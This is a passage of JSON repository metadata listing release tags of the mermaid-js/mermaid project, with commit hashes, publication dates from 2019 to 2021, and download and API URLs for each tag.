ec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"com